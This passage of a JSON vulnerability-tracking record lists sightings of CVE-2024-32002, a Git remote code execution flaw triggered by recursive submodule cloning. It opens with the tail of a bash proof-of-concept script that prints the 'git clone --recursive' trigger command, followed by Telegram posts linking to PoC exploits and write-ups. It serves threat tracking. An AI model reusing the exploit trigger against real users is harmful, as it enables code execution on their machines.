submodules\nshow_command() {\n  # Define color codes\n  RED='\\033[0;31m'\n  GREEN='\\033[0;32m'\n  YELLOW='\\033[0;33m'\n  BLUE='\\033[0;34m'\n  NC='\\033[0m' # No Color\n\n  # Output the command with colors\n  echo -e \"${GREEN}Trigger the exploit with ${NC}:\\n\"\n  echo -e \"${YELLOW}git clone --recursive ${BLUE}$SMASH_REPO ${RED}GITRCE${NC}\"\n}\n\n# Execute functions\nsetup_HULK_REPO\nsetup_pullme_repo\nshow_command", "creation_timestamp": "2024-05-19T19:29:11.000000Z"}, {"uuid": "886d7a98-9850-48c2-93ad-40e76ecec1e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/680", "content": "\u200aCritical Git Vulnerability CVE-2024-32002: Researcher Unveils RCE Exploit with PoC\n\nhttps://securityonline.info/critical-git-vulnerability-cve-2024-32002-researcher-unveils-rce-exploit-with-poc/", "creation_timestamp": "2024-05-20T15:08:38.000000Z"}, {"uuid": "7196ea61-ab62-47b2-8f1f-4fcd0d9cef6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/Ugl_MvDTnSuasV293MEcdRpmK2elBpnfRk-Qt_RcIla-DtA", "content": "", "creation_timestamp": "2025-03-06T16:00:09.000000Z"}, {"uuid": "878773ec-43a6-4760-b7af-2725732c6e41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/IntrusionExploit/141", "content": "CVE-2024-32002 GIT RCE\n\nRemote code execution in Git submodules.\nPayload can be enabled via recursive cloning of a Git repository.\n\nhttps://github.com/safebuffer/CVE-2024-32002", "creation_timestamp": "2024-06-23T04:46:24.000000Z"}, {"uuid": "79502847-d4cd-44a6-9932-884db41f2171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "seen", "source": "Telegram/qmyjNsJq0w2Mhgqv8d5ixGPBisQXZTV0zADRwHHzkWkk", "content": "", "creation_timestamp": "2024-05-21T13:12:30.000000Z"}, {"uuid": "07f86b35-bae0-4243-b6de-627597c6ceb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/theninjaway1337/1626", "content": "PoC Exploit Released for Critical Git RCE Vulnerability\n\nA critical vulnerability in\u00a0Git, identified as CVE-2024-32002, has recently come to light, posing significant risks to users of the widely used version control system.\n\nThe vulnerability allows for remote code execution (RCE) during the cloning of repositories with submodules, and proof-of-concept (PoC) exploits have already been released, raising concerns within the cybersecurity community, a tweet by ThreatMon.\n\nhttps://cybersecuritynews.com/poc-exploit-released-2/", "creation_timestamp": "2024-05-25T00:53:07.000000Z"}, {"uuid": "f7b3972d-7401-46ac-85f7-7d1f431b3d69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/hCfCsWkJLNX-4ZZS6AKhD47aw1Wu0GxnlvM04EnHwON9-Gg", "content": "", "creation_timestamp": "2025-03-05T22:00:05.000000Z"}, {"uuid": "cef77877-c3eb-4df7-a70e-82ec98f26d29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2089", "content": "CVE-2024-32002 GIT RCE\n*\n\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044f\u0445 Git.\nPayload \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u043e\u0435 \u043a\u043b\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f Git.\n*\nPOC exploit\n\n#git #rce", "creation_timestamp": "2024-05-19T19:18:04.000000Z"}, {"uuid": "b1f88849-225b-42b4-b7f3-316507c9942f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "Telegram/weeV35CtX9VvhYxv_esv3eEGn0BW2BOQvlkQ2dsboOL8q-o", "content": "", "creation_timestamp": "2024-06-22T18:58:28.000000Z"}, {"uuid": "644e19a6-5560-46f6-a62a-1c461d02eb31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2513", "content": "https://github.com/safebuffer/CVE-2024-32002\n\nCVE-2024-32002 RCE PoC\n#github #poc", "creation_timestamp": "2024-05-20T05:16:40.000000Z"}, {"uuid": "f72b3a20-27d5-4088-b408-4abd9805108f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8714", "content": "Exploiting CVE-2024-32002: RCE via git clone\n\nhttps://amalmurali.me/posts/git-rce/", "creation_timestamp": "2024-05-19T20:39:35.000000Z"}, {"uuid": "d51a84c5-f03d-4c06-ad00-686259c4fbee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10533", "content": "#exploit\n1. CVE-2024-32002:\nRCE via git clone\nhttps://amalmurali.me/posts/git-rce\n\n2. CVE-2024-25006:\nXenForo <=2.2.13 Zip Slip Vulnerability\nhttps://karmainsecurity.com/KIS-2024-01\n\n3. CVE-2024-0200:\nGitHub's Environment Variables & GHES Shell\nhttps://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell", "creation_timestamp": "2024-05-21T15:07:43.000000Z"}]}